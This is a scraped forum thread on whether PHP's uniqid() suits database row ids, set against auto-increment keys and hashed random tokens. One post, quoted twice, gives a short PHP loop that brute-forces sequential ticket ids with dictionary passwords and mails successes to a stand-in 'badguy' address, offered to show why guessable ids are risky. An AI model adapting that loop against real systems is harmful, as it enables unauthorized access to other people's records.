Does using uniqid seem a reasonable way of generating a unique row
identifyer in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?
9  3727 
MrBoom: Does using uniqid seem a reasonable way of generating a unique row
identifyer in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
André Næss
Shawn Wilson: André Næss wrote:
MrBoom:
> Does using uniqid seem a reasonable way of generating a unique row
> identifyer in a db table? It's *highly* unlikely that two ids are
> going to be generated in the same microsecond, but if they are,
> setting lcg as true should eliminate any problems I'd have thought.
> Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.
Then start the incrementing number at 1122342345365 :)
But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both system had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.
André Næss
André Næss wrote:
Shawn Wilson:
André Næss wrote:
MrBoom:
> Does using uniqid seem a reasonable way of generating a unique row
> identifyer in a db table? It's *highly* unlikely that two ids are
> going to be generated in the same microsecond, but if they are,
> setting lcg as true should eliminate any problems I'd have thought.
> Anyway, these are my thoughts, do people agree?
Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.
Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk.
http://domain.com/support.php?ticketid=1122342345365
...a weeks goes by...
http://domain.com/support.php?ticketid=1122342345372
= 7 tickets per week
Or, if you were trying to read other people's tickets (or whatever else), you
could do something like this:
for($i=11223423 45365;$i<112234 2345465;++$i) {
foreach($arrDic tionary as $word)
if
(is_real_page(" http://domain.com/support.php?tic ketid=112234234 5365&password=$ word"))
mail("ba****@ba dguy.com", "We're in", $i." is a real ticket # with
password $word");
}
This is obviously a simplistic example. Any decent system should have some kind
of reporting/blacklisting script set up for this kind of approach, but the point
is, if you're trying to get in it's a lot easier if you know the first step.
But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both system had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.
I would agree that if the key is unlikely to ever be presented to the user, then
the simpler the better. I just brought up the above examples as practical uses
for non-sequential unique ids.
Regards,
Shawn
--
Shawn Wilson sh***@glassgian t.com http://www.glassgiant.com
I don't know about MySQL, but in MS SQL the increment can be greater than 1.
If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.
Uzytkownik "Shawn Wilson" <sh***@glassgia nt.com> napisal w wiadomosci
news:40******** *******@glassgi ant.com... André Næss wrote:
Shawn Wilson:
André Næss wrote:
>
> MrBoom:
>
> > Does using uniqid seem a reasonable way of generating a unique row
> > identifyer in a db table? It's *highly* unlikely that two ids are
> > going to be generated in the same microsecond, but if they are,
> > setting lcg as true should eliminate any problems I'd have thought.
> > Anyway, these are my thoughts, do people agree?
>
> Why would you want to do that when an auto-incrementing number is
> *guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the
size of a database.
Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people
no information by default, then give them just what they need, rather than
give them everything, then take away what's a security risk.
http://domain.com/support.php?ticketid=1122342345365
..a weeks goes by...
http://domain.com/support.php?ticketid=1122342345372
= 7 tickets per week
Or, if you were trying to read other people's tickets (or whatever else),
you could do something like this:
for($i=11223423 45365;$i<112234 2345465;++$i) {
foreach($arrDic tionary as $word)
if
(is_real_page(" http://domain.com/support.php?tic ketid=112234234 5365&password
=$word")) mail("ba****@ba dguy.com", "We're in", $i." is a real ticket # with
password $word");
}
This is obviously a simplistic example. Any decent system should have
some kind of reporting/blacklisting script set up for this kind of approach, but the
point is, if you're trying to get in it's a lot easier if you know the first
step. But in the end you should strive to find good keys. I'm currently
working on importing data from an external datasource into an existing webshop. If
both system had actually used natural keys this wouldn't be hard, but
due to the current use of surrogate keys it's a real pain.
I would agree that if the key is unlikely to ever be presented to the
user, then the simpler the better. I just brought up the above examples as practical
uses for non-sequential unique ids.
Regards,
Shawn
--
Shawn Wilson
sh***@glassgian t.com
http://www.glassgiant.com
"Chung Leong" <ch***********@ hotmail.com> wrote in message news:<FN******* *************@c omcast.com>... What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.
But surely setting lcg as true would make it unguessable?
Chung Leong wrote:
I don't know about MySQL, but in MS SQL the increment can be greater than 1.
Any size increment would be easy to spot by generating 2 or 3 requests in a
row(as in a ticket system).
If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.
Yes, that would be more secure. I'm not suggesting anyone ever use only
uniqid() in lieu of passwords. But if you just want a quick unique id to
prevent giving away information _easily_, I think it's a good choice. Use a
prefix, set lcg to true, and run it through md5() if it's very
private/important.
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.
Assuming they were trying to get a particular request and you didn't use lcg,
yes. But it still requires that they expend a lot of time just to get the first
step (knowing the id). The problem I have with incremental primary keys as
user-visible identifiers is that they give hackers a (potentially) huge number
of starting points. In other words, they could try the 10 most common passwords
on 1000 tickets/accounts/whatever. And they'd be likely to get one or more
hits.
Regards,
Shawn
--
Shawn Wilson sh***@glassgian t.com http://www.glassgiant.com
Shawn Wilson <sh***@glassgia nt.com> wrote in message news:<40******* ********@glassg iant.com>... André Næss wrote:
Shawn Wilson:
André Næss wrote:
>
> MrBoom:
>
> > Does using uniqid seem a reasonable way of generating a unique row
> > identifyer in a db table? It's *highly* unlikely that two ids are
> > going to be generated in the same microsecond, but if they are,
> > setting lcg as true should eliminate any problems I'd have thought.
> > Anyway, these are my thoughts, do people agree?
>
> Why would you want to do that when an auto-incrementing number is
> *guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.
Then start the incrementing number at 1122342345365 :)
Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk.
IMHO, avoiding auto_incremente d key is a mess. Probably may
consider crypting the query string.
eg. $fake_ticket_id = substr(md5($rea l_ticket_id), 0, 5) .
dechex($real_ti cket_id). substr(md5($rea l_ticket_id), 5, 5);
In this case, we may get back $real_ticket_id from the
$fake_ticket_id and can also check the validity of the query string.
--
"Success = 10% sweat + 90% tears"
If you live in USA, please support John Edwards.
Email: rrjanbiah-at-Y!com
Don't know. The function is designed to guarantee uniqueness, not
randomness. For security purpose I prefer to use something that was
designed--and more importantly, was tested and analysed--with that in mind.
The primary key doesn't need to be random if you're not exposing it, that is
my point. If you need some kind of a random tracking string, then generate
one and stick it in the database.
Uzytkownik "MrBoom" <an************ @hotmail.com> napisal w wiadomosci
news:9b******** *************** ***@posting.goo gle.com... "Chung Leong" <ch***********@ hotmail.com> wrote in message
news:<FN******* *************@c omcast.com>... What you get from uniqid() isn't unguessable, since it's based on the
system time. All a potential hacker has to do is scan through the particular
time range during which the id might have been generated.
But surely setting lcg as true would make it unguessable? This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: John |
last post by:
I notice uniqid() returns charcaters that need special precaution like
spaces and periods, my question is does it return quotes in some
cases. This will be extremely harmful to my application.
Thank you
|
by: kevin parks |
last post by:
hi. I've been banging my head against this one a while and have asked
around, and i
am throwing this one out there in the hopes that some one can shed
some light on
what has turned out to be a tough problem for me (though i am getting
closer).
i have been mucking with a lot of data in a dictionary that looks
like:
|
by: Agoston Bejo |
last post by:
I want to enforce such a constraint on a column that would ensure that the
values be all unique, but this wouldn't apply to NULL values. (I.e. there
may be more than one NULL value in the column.)
How can I achieve this?
I suppose I would get the most-hated "table/view is changing,
trigger/function may not see it" error if I tried to write a trigger that
checks the uniqueness of non-null values upon insert/update.
|
by: reneeccwest |
last post by:
Hello,
I plan to create a table with 3 unique keys.
Combination of three fields has to be unique for each row in a table that
are vendor ID (char 8), vendor name (char 40), and vendor office (5).
|
by: Kamil |
last post by:
Hello
What should I use for better perfomance since
unique constraint always use index ?
Thanks
Kamil
| | |
by: Bob Stearns |
last post by:
I was under the impression that the primary key had to be a unique
index. Since I usually create my primary indices before my primary keys,
in order to get the indices in the same schema as their tables, it is
possible , by error, to create such an index without the unique
attribute. DB2 UDB 8.1.5 Linux uses such an index for the primary key
anyway, thus losing the unique property of the primary key. Is this a
bug or a feature, i.e. a...
|
by: bwmiller16 |
last post by:
Guys -
I'm doing a database consistency check for a client and I find that
they're building unique indexes for performance/query reasons where
they could be using non-unique indexes.
Note that these columns in the unique indexes are truly unique and
don't constitute a collision hazard of any kind.
Now, I personally wouldn't use unique where non-unique would do but I
|
by: aj |
last post by:
DB2 WSE 8.1 FP5
Red Hat AS 2.1
What is the difference between adding a unique constraint like:
ALTER TABLE <SCHEMA>.<TABLE> ADD CONSTRAINT CC1131378283225 UNIQUE (
<COL1>) ;
and adding a unique index like:
|
by: Laurence |
last post by:
Hi there,
How to differentiate between unique constraint and unique index? These
are very similar but I cannot differentiate them?
Could someone give me a hand?
Thanks in advance
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it.
First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
| | |
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
| | |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |
